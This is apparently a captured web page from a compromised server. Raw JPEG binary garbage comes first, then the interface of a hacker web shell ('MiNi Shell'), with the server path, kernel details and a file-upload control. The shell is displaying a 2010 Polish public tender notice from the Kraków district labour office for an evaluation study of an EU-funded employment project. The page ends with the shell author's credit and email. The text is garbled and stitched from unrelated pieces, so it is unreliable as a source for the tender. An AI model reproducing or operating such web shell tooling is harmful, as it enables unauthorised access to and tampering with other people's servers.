JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100909/284274-N-2010.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego 
prowadzone w trybie przetargu nieograniczonego o wartości poniżej 193 000 euro 
na przeprowadzenie badania ewaluacyjnego projektu systemowego 7 życzeń w ramach Programu Operacyjnego Kapitał Ludzki 2007- 2013
znak sprawy: ZP- 271/62/2010</b><br>
<b>Numer ogłoszenia: 284274 - 2010; data zamieszczenia: 09.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego 
prowadzone w trybie przetargu nieograniczonego o wartości poniżej 193 000 euro 
na przeprowadzenie badania ewaluacyjnego projektu systemowego 7 życzeń w ramach Programu Operacyjnego Kapitał Ludzki 2007- 2013
znak sprawy: ZP- 271/62/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przeprowadzenie badania ewaluacyjnego rozumianego jako ocena, o której mowa w art. 9 ust. 2d pkt1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 r., Nr 69, poz. 415 z późn. zm.), którego celem jest ocena jakości projektu systemowego pn. 7 życzeń realizowanego przez Urząd Pracy Powiatu Krakowskiego w ramach Poddziałania 6.3.1 POKL oraz ocena wpływu zrealizowanych w ramach projektu działań na podniesienie poziomu aktywności zawodowej  oraz zdolności do zatrudnienia jego uczestników. 
2.	Wykonawca wyznaczy do realizacji zamówienia zespół badawczy złożony z osób dysponujących wiedzą związaną z problematyką zatrudnienia oraz rynku pracy a także doświadczeniem w realizacji co najmniej dwóch badań ewaluacyjnych przeprowadzonych w obszarze rynku pracy. Ilość osób tworzących zespół badawczy winna zapewnić realizację zamówienia w terminie wskazanym przez Zamawiającego.
3.	Uczestnikami projektu w latach 2008 i 2009, tj. w latach objętych badaniem, było 2732 osób, z tego w roku 2008 - 1321 osób, w roku 2009 - 1411 osób.
4.	Wykonawca zobowiązuje się do:
a)	sprawnej i terminowej realizacji badania;
b)	współpracy z Urzędem Pracy Powiatu Krakowskiego, polegającej na przygotowaniu narzędzi  badawczych oraz materiałów  do badania; 
c)	pozostawania w stałym kontakcie Zamawiającym i wskazania osoby upoważnionej do kontaktów roboczych;
d)	informowania o stanie prac oraz pojawiających się problemach i innych zagadnieniach istotnych dla realizacji badania ewaluacyjnego;
e)	przekazania Zamawiającemu wstępnej wersji raportu końcowego  oraz ostatecznej wersji raportu końcowego, narzędzi badawczych oraz wszystkich baz danych.
5.	Wykonawca zobowiązuje się do zapewnienia respondentom  pełnej anonimowości w celu uzyskania jak najbardziej wiarygodnych danych. 
6.	W celu zabezpieczenia danych osobowych udostępnionych Wykonawcy w celu realizacji zamówienia, po zawarciu umowy w sprawie zamówienia publicznego, lecz przed przystąpieniem do realizacji zamówienia, Zamawiający jako beneficjent systemowy oraz Wykonawca zobowiązani będą do  zawarcia  umowy powierzenia Wykonawcy przetwarzania danych osobowych, której wzór stanowi załącznik nr 1 do SIWZ.



7.	W ramach realizacji zamówienia Wykonawca dokona oceny:
a)	w jakim stopniu cele projektu odpowiadały problemom lokalnego rynku pracy,
b)	stopnia realizacji zamierzonych celów projektu, sposobu zarządzania projektem oraz jego wdrażania, jakości współpracy z lokalnymi instytucjami zaangażowanymi w realizację Programu Operacyjnego Kapitał Ludzki 2007-2013,
c)	identyfikacji barier i problemów związanych z realizacją projektów systemowych (w tym związanych z zarządzaniem projektami i ich wdrażaniem),
d)	sposobu doboru instrumentów rynku pracy pod kątem ich adekwatności do celów projektu,
e)	użyteczności oferowanego wsparcia z punktu widzenia uczestników projektów,
f)	trwałości działań podejmowanych w projekcie w okresie co najmniej 6 miesięcy od zakończenia przez uczestników udziału w projekcie.

8.	Wykonawca realizując zamówienie zastosuje następujące kryteria  ewaluacyjne:
a)	trafność (adekwatność) - rozumiana jako ocena sposobu doboru zastosowanych w projekcie instrumentów pod kątem realizacji celów projektu systemowego 7 życzeń, celu Działania 6.1 POKL, celów szczegółowych Priorytetu VI POKL, celu szczegółowego nr 1 POKL, a także ocena związku pomiędzy zdefiniowanymi celami a istniejącymi problemami społeczno-gospodarczymi, które mają zostać rozwiązane dzięki interwencji EFS;
b)	skuteczność - rozumiana jako stopień, w jakim wdrażane w projekcie działania, poprzez wykorzystane instrumenty rynku pracy, przyczyniają się do realizacji celów  projektów 7 życzeń, celu Działania 6.1, celów szczegółowych Priorytetu VI, celu szczegółowego nr 1 POKL - czyli w jakim stopniu zakładane cele projektu zostały zrealizowane;
c)	użyteczność - rozumiana jako wpływ zaoferowanego wsparcia na poprawę sytuacji uczestników  na rynku pracy, a także ocena korzyści zmian wywołanych realizacją projektu z punktu widzenia jego uczestników oraz ocena: do jakiego stopnia oddziaływanie projektu odpowiada potrzebom grupy docelowej;
d)	trwałość - rozumiana jako użyteczność w dłuższym okresie czasu, a więc ocena czy i w jakim stopniu zmiany sytuacji zawodowej  uczestników projektu wywołane jego oddziaływaniem  są zauważalne w okresie co najmniej 6 miesięcy po zakończeniu udziału w projekcie.

9.	W ramach realizowanego badania ewaluacyjnego uczestników projektu 7 życzeń  Wykonawca wykorzysta opisane poniżej  techniki badawcze oraz narzędzia badawcze:
A.	analiza danych zastanych (desk research) - analizie poddane zostaną:
a)	dokumentacja projektu 7 życzeń zrealizowanego  w latach 2008 i 2009 (zarówno dokumentacja finansowa, jak i rzeczowa, tj. wniosek o dofinansowanie, wniosek o płatność);
b)	zapisy dokumentów programowych POKL, tj.: Programu Operacyjnego Kapitał Ludzki, Szczegółowego Opisu Priorytetów POKL,  Projekty systemowe powiatowych urzędów pracy w ramach Programu Operacyjnego Kapitał Ludzki;
c)	zapisy programu promocji zatrudnienia oraz aktywizacji lokalnego rynku pracy, stanowiącego część powiatowej strategii rozwiązywania problemów społecznych, zgodnie z art. 9, ust 1. pkt 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy ( Dz. U. z 2008r. Nr 69 , poz. 415 z późn.zm.);
d)	dane pozyskane z rejestru Zamawiającego na temat sytuacji na rynku pracy, w jakiej znajdują się uczestnicy projektu systemowego, którzy zakończyli udział w projekcie;


B.	wywiady telefoniczne (CATI) z osobami, które zakończyły udział w projekcie 7 życzeń w 2009 r., co najmniej 6 miesięcy przed udziałem w badaniu. 
Dobór respondentów do wywiadu telefonicznego będzie doborem losowym i zakładać winien jak największą reprezentatywność. Jednocześnie, w celu zapewnienia porównywalnego poziomu błędu statystycznego minimalna próba losowa do badania powinna wynosić:
- co najmniej 278 osób w przypadku populacji nie przekraczającej 500 osób
- co najmniej 385 osób w przypadku populacji 501-1000 osób
- co najmniej 476 osób w przypadku populacji 1001-2000 osób
- co najmniej 516 osób w przypadku populacji 2001-3000 osób
Losowanie próby powinno opierać się na operacie uczestników, którzy zakończyli udział w projekcie 7 życzeń w 2009 r., ale którzy mogli rozpocząć udział w projekcie w 2008 r. Wzór narzędzia badawczego dla wywiadu telefonicznego stanowi załącznik nr 2 do SIWZ.

C.	wywiad indywidualny z osobą do kontaktów roboczych, określoną we wniosku o dofinansowanie projektu 7 życzeń. 
Dyspozycje do wywiadu indywidualnego określone zostały w załączniku nr 3 do SIWZ.  Pytania powinny zostać pogłębione przez badacza, a poruszane w ramach wywiadu tematy powinny wykraczać poza zakres pytań przedstawionych w dyspozycjach w celu uzyskania jak najbardziej rzetelnych i dokładnych informacji na temat jakości zarządzania i wdrażania projektu systemowego, stosowanych instrumentów rynku pracy oraz współpracy z innymi instytucjami przy realizacji projektu.
10.	Wykonawca zobowiązany będzie do oznakowania przygotowanych w trakcie badania materiałów, np. kwestionariuszy, raportów, godłem UE, logo Programu Operacyjnego Kapitał Ludzki oraz informacją o współfinansowaniu badania ze środków UE w następującej formie: Badanie ewaluacyjne współfinansowane przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego. Użyte emblematy oraz sformułowania muszą być zgodne z zasadami wizualizacji PO KL.
11.	Wstępną wersję raportu końcowego Wykonawca przedłoży Zamawiającemu w terminie do 15 listopada 2010 r. Ostateczną wersję raportu końcowego Wykonawca przedłoży Zamawiającemu w terminie do 10 grudnia 2010 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek określony w punkcie III.3) SIWZ został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie osób uczestniczących w wykonaniu zamówienia stanowiącym załącznik nr 7 do SIWZ, że dysponuje lub będzie dysponował zespołem badawczym złożonym z osób, które przeprowadzą badanie ewaluacyjne, z których każda posiada doświadczenie w realizacji co najmniej dwóch badań ewaluacyjnych przeprowadzonych w obszarze rynku pracy;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - załącznik nr 4 do SIWZ;
2.	Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych osób na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli w Wykazie, o którym mowa w punkcie IV. 4 SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował. Dotyczy sytuacji, w której Wykonawca polega na osobach innych podmiotów. 
3.	Pełnomocnictwo dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania Wykonawcy w postępowaniach przetargowych, w tym podpisywania dokumentów przetargowych;
4.	Formularz dotyczący podwykonawców z określeniem ich udziału w wykonywaniu zamówienia - załącznik nr 8 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od Zamawiającego lub Wykonawcy, ograniczenia zakresu przedmiotu zamówienia, w szczególności w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2010 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro, stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT  WSPÓŁFINANSOWANY 
Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO
REALIZOWANY W RAMACH 
PODDZIAŁANIA 6.1.3
PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com